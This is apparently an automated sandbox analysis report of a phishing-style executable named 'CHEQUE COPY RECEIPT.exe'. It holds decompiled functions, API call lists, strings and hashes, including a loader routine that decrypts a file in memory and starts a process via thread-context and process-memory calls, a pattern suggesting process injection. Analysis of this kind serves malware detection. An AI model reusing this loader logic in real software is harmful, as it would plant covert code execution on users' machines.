				_v100 = 0x6f28fae0;
				_t124 = 4;
				_t126 = E100041FD(_t159,  *((intOrPtr*)(_t158 + _t124 * 0 - 0x6c))); // executed
				_t160 = _t126;
				if(_t126 != 0) {
					L4:
					_v60(0x7918);
					L5:
					_v68(0,  &_v1248, 0x103);
					_t130 = CreateFileW(_a4, 0x80000000, 7, 0, 3, 0x80, 0);
					_v20 = _t130;
					if(_v20 != 0xffffffff) {
						_t131 = _v76(_v20, 0);
						_v16 = _t131;
						__eflags = _v16 - 0xffffffff;
						if(_v16 != 0xffffffff) {
							_t132 = VirtualAlloc(0, _v16, 0x3000, 4);
							_v12 = _t132;
							__eflags = _v12;
							if(_v12 != 0) {
								_t134 = ReadFile(_v20, _v12, _v16,  &_v84, 0);
								__eflags = _t134;
								if(_t134 != 0) {
									_t99 =  &_v56; // 0x65
									E10004001(_v12, _t99, 0x20);
									_t137 = E10003034(_t156, _t157, __eflags, _v12); // executed
									__eflags = _t137;
									if(_t137 != 0) {
										_v60(0xbb8);
										E10003005(_t156,  &_v140, 0x10);
										E10003005(_t156,  &_v208, 0x44);
										_t137 = _v96( &_v1248, _v92(0, 0, 0, 0x20, 0, 0,  &_v208,  &_v140));
										__eflags = _t137;
										if(_t137 != 0) {
											_t137 = _v64(0);
										}
									}
									ExitProcess(0);
								}
								return _t134;
							}
							return _t132;
						}
						return _t131;
					}
					return _t130;
				}
				_t147 = 4;
				_t149 = E100041FD(_t160,  *((intOrPtr*)(_t158 + (_t147 << 0) - 0x6c))); // executed
				_t161 = _t149;
				if(_t149 != 0) {
					goto L4;
				}
				_t150 = 4;
				_t152 = E100041FD(_t161,  *((intOrPtr*)(_t158 + (_t150 << 1) - 0x6c))); // executed
				_t162 = _t152;
				if(_t152 != 0) {
					goto L4;
				}
				_t153 = 4;
				_t155 = E100041FD(_t162,  *((intOrPtr*)(_t158 + _t153 * 3 - 0x6c))); // executed
				if(_t155 == 0) {
					goto L5;
				}
				goto L4;
			}

0x100042a0
0x100042a0
0x100042a0
0x100042a9
0x100042ad
0x100042b1
0x100042b5
0x100042b9
0x100042bd
0x100042c1
0x100042c5
0x100042c9
0x100042cd
0x100042d1
0x100042d5
0x100042d9
0x100042dd
0x100042e1
0x100042e5
0x100042e9
0x100042ed
0x100042f1
0x100042f5
0x100042f9
0x100042fd
0x10004301
0x10004305
0x10004309
0x1000430d
0x10004311
0x10004315
0x10004319
0x1000431d
0x10004321
0x10004325
0x10004329
0x1000432d
0x10004331
0x10004335
0x10004339
0x1000433d
0x10004346
0x10004356
0x10004366
0x10004376
0x10004386
0x10004396
0x100043a6
0x100043b6
0x100043c6
0x100043d6
0x100043e6
0x100043f6
0x100043f9
0x10004400
0x10004407
0x1000440e
0x10004417
0x1000441f
0x10004424
0x10004426
0x10004460
0x10004465
0x10004468
0x10004476
0x1000448e
0x10004491
0x10004498
0x100044a4
0x100044a7
0x100044aa
0x100044ae
0x100044c1
0x100044c4
0x100044c7
0x100044cb
0x100044e1
0x100044e4
0x100044e6
0x100044ec
0x100044f3
0x100044fb
0x10004500
0x10004502
0x10004509
0x10004515
0x10004523
0x1000454d
0x10004550
0x10004552
0x10004556
0x10004556
0x10004552
0x1000455b
0x1000455b
0x00000000
0x100044e6
0x00000000
0x100044cb
0x00000000
0x100044ae
0x00000000
0x10004498
0x1000442a
0x10004432
0x10004437
0x10004439
0x00000000
0x00000000
0x1000443d
0x10004444
0x10004449
0x1000444b
0x00000000
0x00000000
0x1000444f
0x10004457
0x1000445e
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 100041FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 10004242

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 1000448E

Part of subcall function 100041FD: Process32FirstW.KERNEL32(000000FF,0000022C), ref: 10004266

VirtualAlloc.KERNEL32(00000000,000000FF,00003000,00000004), ref: 100044C1
ReadFile.KERNEL32(000000FF,00000000,000000FF,00000000,00000000), ref: 100044E1
ExitProcess.KERNEL32(00000000), ref: 1000455B

Strings

e5c43b22db9e47f299e20e37f43fd12b, xrefs: 100044EC, 100044EF

Memory Dump Source

Source File: 00000000.00000002.241943494.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.241682424.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241819208.0000000010001000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.241866265.0000000010002000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241953388.0000000010005000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile$AllocExitFirstProcessProcess32ReadSnapshotToolhelp32Virtual
String ID: e5c43b22db9e47f299e20e37f43fd12b
API String ID: 1928574196-3844863974
Opcode ID: 9374fa99c5471f6679ac717fa99e6c74e7f1fbc9bbeff08401bbb0a6b160f266
Instruction ID: 58b0c4507ae3875bd35d106dc6ee5680b6bdeeff36dd3e6900c86c7a562481e9
Opcode Fuzzy Hash: 9374fa99c5471f6679ac717fa99e6c74e7f1fbc9bbeff08401bbb0a6b160f266
Instruction Fuzzy Hash: 7C9158B0D04288EEFF02CBE4CC0ABDDBFB5AF15385F114055E640BA192DBB61A15CB29

Uniqueness

Uniqueness Score: -1.00%

Function 00405E15, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E15(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3ec; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}

0x00405e19
0x00405e1f
0x00405e20
0x00405e20
0x00405e25
0x00405e26
0x00405e29
0x00405e33
0x00405e40
0x00405e43
0x00405e4b
0x00000000
0x00000000
0x00405e4f
0x00000000
0x00000000
0x00405e51
0x00000000
0x00405e51
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405E29
GetTempFileNameA.KERNEL32(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405E43

Strings

nsa, xrefs: 00405E20
"C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe" , xrefs: 00405E15
C:\Users\user\AppData\Local\Temp\, xrefs: 00405E18

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2367974217
Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
Instruction ID: 94097d04b6c38ee8b1870d6a931f35239ed30ef0cd20ec9d97f11959184772c3
Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
Instruction Fuzzy Hash: E4F0A7363442087BDB109F55EC44B9B7B9DDF91750F14C03BF984DA1C0D6B0D9988798

Uniqueness

Uniqueness Score: -1.00%

Function 73CA16DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E73CA16DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v88;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x73ca405c = _a8;
				 *0x73ca4060 = _a16;
				 *0x73ca4064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73ca4038, E73CA1556);
				_push(1); // executed
				_t37 = E73CA1A98(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E73CA22AF(_t54);
					}
					E73CA22F1(_t67, _t54);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_t37 = E73CA24D8(_t54);
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x818; // 0x818
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E73CA156B(_t54,  &_v88);
								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
								_t18 = _t54 + 0x818; // 0x818
								_t72 = _t18;
								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
								 *_t72 = 3;
								E73CA24D8(_t54);
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							E73CA24D8(_t54);
							_t37 = GlobalFree(E73CA1266(E73CA1559(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E73CA249E(_t54);
							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x808);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
								_t37 = E73CA14E2( *0x73ca4058);
							}
						}
						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E73CA2CC3(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E73CA2A38(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E73CA26B2(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x73ca16db
0x73ca16db
0x73ca16db
0x73ca16e5
0x73ca16ed
0x73ca16fa
0x73ca1708
0x73ca170b
0x73ca170d
0x73ca1712
0x73ca1717
0x73ca1836
0x73ca1836
0x73ca171d
0x73ca1721
0x73ca1724
0x73ca1729
0x73ca172b
0x73ca1731
0x73ca1737
0x73ca1767
0x73ca176e
0x73ca1792
0x73ca17dd
0x73ca1794
0x73ca1794
0x73ca1795
0x73ca179b
0x73ca179c
0x73ca17a6
0x73ca17a9
0x73ca17ae
0x73ca17b5
0x73ca17b5
0x73ca17bc
0x73ca17c2
0x73ca17c8
0x73ca17d5
0x73ca17d6
0x73ca17d9
0x73ca1770
0x73ca1771
0x73ca1786
0x73ca1786
0x73ca17e7
0x73ca17ea
0x73ca17f7
0x73ca17fe
0x73ca1806
0x73ca1809
0x73ca1809
0x73ca1806
0x73ca1816
0x73ca181e
0x73ca1823
0x73ca1816
0x73ca182b
0x00000000
0x73ca182d
0x00000000
0x73ca182e
0x73ca182b
0x73ca173b
0x73ca173e
0x73ca175c
0x00000000
0x00000000
0x73ca175f
0x73ca1764
0x73ca1764
0x73ca1766
0x00000000
0x73ca1766
0x73ca1740
0x73ca1741
0x73ca1749
0x73ca174a
0x00000000
0x73ca174a
0x73ca1743
0x73ca1744
0x73ca1752
0x00000000
0x73ca1752
0x73ca1747
0x00000000
0x00000000
0x00000000
0x73ca1747

APIs

Part of subcall function 73CA1A98: GlobalFree.KERNEL32 ref: 73CA1D09
Part of subcall function 73CA1A98: GlobalFree.KERNEL32 ref: 73CA1D0E
Part of subcall function 73CA1A98: GlobalFree.KERNEL32 ref: 73CA1D13

GlobalFree.KERNEL32 ref: 73CA1786
FreeLibrary.KERNEL32(?), ref: 73CA1809
GlobalFree.KERNEL32 ref: 73CA182E

Part of subcall function 73CA22AF: GlobalAlloc.KERNEL32(00000040,?), ref: 73CA22E0

Part of subcall function 73CA26B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73CA1757,00000000), ref: 73CA2782

Part of subcall function 73CA156B: wsprintfA.USER32 ref: 73CA1599

Strings

, xrefs: 73CA180F

Memory Dump Source

Source File: 00000000.00000002.241965832.0000000073CA1000.00000020.00020000.sdmp, Offset: 73CA0000, based on PE: true

Associated: 00000000.00000002.241959915.0000000073CA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241972886.0000000073CA3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241983655.0000000073CA5000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: a65fe931c2c166f5302db4c4e1e67842a62095faa58e327e692620f186c9f244
Instruction ID: 8456d997427cda48a3e716ef74c2f1361a949157a7c7951bd4000cbcba1f0a87
Opcode Fuzzy Hash: a65fe931c2c166f5302db4c4e1e67842a62095faa58e327e692620f186c9f244
Instruction Fuzzy Hash: 9D41BE7200035A9BDB01EF6C8984B9A37ADBF04221F199025E95BEE1C6DF789445CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004032BF, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004032BF(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t36;
				intOrPtr _t48;

				_t33 =  *0x429464 -  *0x40b898 + _a4;
				 *0x42f450 = GetTickCount() + 0x1f4;
				if(_t33 <= 0) {
					L22:
					E00402E52(1);
					return 0;
				}
				E0040343E( *0x429474);
				SetFilePointer( *0x40a01c,  *0x40b898, 0, 0); // executed
				 *0x429470 = _t33;
				 *0x429460 = 0;
				while(1) {
					_t30 = 0x4000;
					_t11 =  *0x429468 -  *0x429474;
					if(_t11 <= 0x4000) {
						_t30 = _t11;
					}
					_t12 = E00403428(0x41d460, _t30);
					if(_t12 == 0) {
						break;
					}
					 *0x429474 =  *0x429474 + _t30;
					 *0x40b8a0 = 0x41d460;
					 *0x40b8a4 = _t30;
					L6:
					L6:
					if( *0x42f454 != 0 &&  *0x42f500 == 0) {
						 *0x429460 =  *0x429470 -  *0x429464 - _a4 +  *0x40b898;
						E00402E52(0);
					}
					 *0x40b8a8 = 0x415460;
					 *0x40b8ac = 0x8000;
					if(E0040677B(0x40b8a0) < 0) {
						goto L20;
					}
					_t35 =  *0x40b8a8; // 0x415ff3
					_t36 = _t35 - 0x415460;
					if(_t36 == 0) {
						__eflags =  *0x40b8a4; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t30;
						if(_t30 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x429464;
						if(_t16 -  *0x40b898 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00405E8D( *0x40a01c, 0x415460, _t36); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40b898 =  *0x40b898 + _t36;
					_t48 =  *0x40b8a4; // 0x0
					if(_t48 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

0x004032cf
0x004032e2
0x004032e7
0x00403417
0x00403419
0x00000000
0x0040341f
0x004032f3
0x00403306
0x0040330c
0x00403312
0x0040331d
0x00403322
0x00403327
0x0040332f
0x00403331
0x00403331
0x0040333a
0x00403341
0x00000000
0x00000000
0x00403347
0x0040334d
0x00403353
0x00000000
0x00403359
0x0040335f
0x0040337f
0x00403384
0x00403389
0x0040338f
0x00403395
0x004033a6
0x00000000
0x00000000
0x004033a8
0x004033ae
0x004033b0
0x004033d3
0x004033d9
0x00000000
0x00000000
0x004033db
0x004033dd
0x00000000
0x00000000
0x004033df
0x004033df
0x004033f2
0x00000000
0x00000000
0x00403401
0x00000000
0x00403401
0x004033ba
0x004033c1
0x0040340e
0x00403414
0x00403414
0x00000000
0x00403414
0x004033c3
0x004033c9
0x004033cf
0x00000000
0x00000000
0x00000000
0x00403412
0x00403412
0x00000000
0x00403412
0x00000000

APIs

GetTickCount.KERNEL32 ref: 004032D3

Part of subcall function 0040343E: SetFilePointer.KERNEL32(00000000,00000000,00000000,0040313E,?), ref: 0040344C

SetFilePointer.KERNEL32(00000000,00000000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 00403306
SetFilePointer.KERNEL32(?,00000000,00000000,0040B8A0,0041D460,00004000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF), ref: 00403401

Strings

`TA, xrefs: 00403318

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer$CountTick
String ID: `TA
API String ID: 1092082344-1754987364
Opcode ID: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
Instruction ID: bb82d22d1a80a93a7495f99719332701a8bc5653d470bc60fdd2df8261a6fa09
Opcode Fuzzy Hash: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
Instruction Fuzzy Hash: 3A31B3726042159FDB10BF29EE849263BACFB40359B88813BE405B62F1C7785C428A9D

Uniqueness

Uniqueness Score: -1.00%

Function 10003034, Relevance: 6.5, APIs: 4, Instructions: 543processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(?,00000000), ref: 10003355
GetThreadContext.KERNEL32(?,00010007), ref: 10003378
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 1000339C

Memory Dump Source

Source File: 00000000.00000002.241943494.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.241682424.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241819208.0000000010001000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.241866265.0000000010002000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241953388.0000000010005000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$ContextCreateMemoryReadThread
String ID:
API String ID: 2411489757-0
Opcode ID: 9cdcb5365ca6d10b687a1723467ffaa9184928f47fd203e115eddf9ce7210df9
Instruction ID: 39085faca70daa19f6f8bcd55ab0bc5da3e418fa0953938c9b3c92a76162beb1
Opcode Fuzzy Hash: 9cdcb5365ca6d10b687a1723467ffaa9184928f47fd203e115eddf9ce7210df9
Instruction Fuzzy Hash: 65222875E40208EEEB61CBA4DC45BAEB7B9FF04745F20809AE605FA2A0D7715E80DF15

Uniqueness

Uniqueness Score: -1.00%

Function 0040209D, Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040209D(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f518");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4e8 =  *0x42f4e8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00405374(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b890, 0x40a000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E00403A00(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x0040209d
0x0040209d
0x004020a2
0x004020a9
0x00402164
0x004022dd
0x004022dd
0x00402a5a
0x00402a5d
0x00402a69
0x00402a69
0x004020b8
0x004020c2
0x004020c5
0x004020d4
0x004020d8
0x004020de
0x004020e2
0x0040215d
0x00000000
0x0040215d
0x004020e4
0x004020ed
0x004020f1
0x00402135
0x004020f3
0x004020f6
0x004020f9
0x00402129
0x004020fb
0x004020fe
0x00402107
0x00402109
0x00402109
0x00402107
0x004020f9
0x0040213d
0x00402152
0x00402152
0x00000000
0x0040213d
0x004020c8
0x004020ce
0x004020d2
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020C8

Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
Part of subcall function 00405374: SendMessageA.USER32 ref: 00405408
Part of subcall function 00405374: SendMessageA.USER32 ref: 00405422
Part of subcall function 00405374: SendMessageA.USER32 ref: 00405430

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020D8
GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
Instruction ID: e3fe6dffd4d776efa863efd9403cf6e1974d247a329121c392e1043855ccd094
Opcode Fuzzy Hash: 6a921a9c7452e1760777dbc31a04e178e7c47593061c3139424f045b80a43029
Instruction Fuzzy Hash: 2721EE32A00115EBCF20BF648F49B9F76B1AF14359F20423BF651B61D1CBBC49829A5D

Uniqueness

Uniqueness Score: -1.00%

Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405C7E(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405C10(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004058B7(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058D4(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E0040583A(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040624D("C:\\Users\\alfons\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}

0x004015bb
0x004015c2
0x004015c5
0x004015ca
0x004015ce
0x004015d0
0x004015d8
0x004015da
0x004015dc
0x004015e0
0x004015e3
0x004015fb
0x004015fc
0x004015e5
0x004015e5
0x004015e8
0x00000000
0x004015f3
0x004015f4
0x004015f4
0x004015e8
0x00401603
0x0040160a
0x00401617
0x00401617
0x0040160c
0x0040160d
0x00401615
0x00000000
0x00000000
0x00401615
0x0040160a
0x0040161a
0x0040161d
0x0040161f
0x00401620
0x004015d0
0x00401627
0x00401652
0x004022dd
0x00401629
0x0040162b
0x00401636
0x0040163c
0x00401644
0x0040164a
0x0040164a
0x00401644
0x00402a5d
0x00402a69

APIs

Part of subcall function 00405C7E: CharNextA.USER32(?,?,0042BCC0,?,00405CEA,0042BCC0,0042BCC0,7519FA90,?,7519F560,00405A35,?,7519FA90,7519F560,00000000), ref: 00405C8C
Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405C91
Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405CA5

GetFileAttributesA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 0040583A: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D

SetCurrentDirectoryA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 1892508949-1943935188
Opcode ID: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
Instruction ID: 4524d263cfc656ab508a586836abab8f1c5f66e1bf0f475862462bf062351d6a
Opcode Fuzzy Hash: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
